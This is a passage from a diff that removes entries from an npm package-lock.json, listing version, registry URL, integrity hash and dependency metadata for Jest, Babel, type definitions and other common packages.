"node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.3.0.tgz", - "integrity": "sha512-riT/3vI5YpVH6/qomlDnJow6TBee2PBKSEpx3O32EGPYbWGIRsIlGRms3Sm74wYE1JMo8RnO04Hb12+v1J5ICw==", - "dev": true - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": 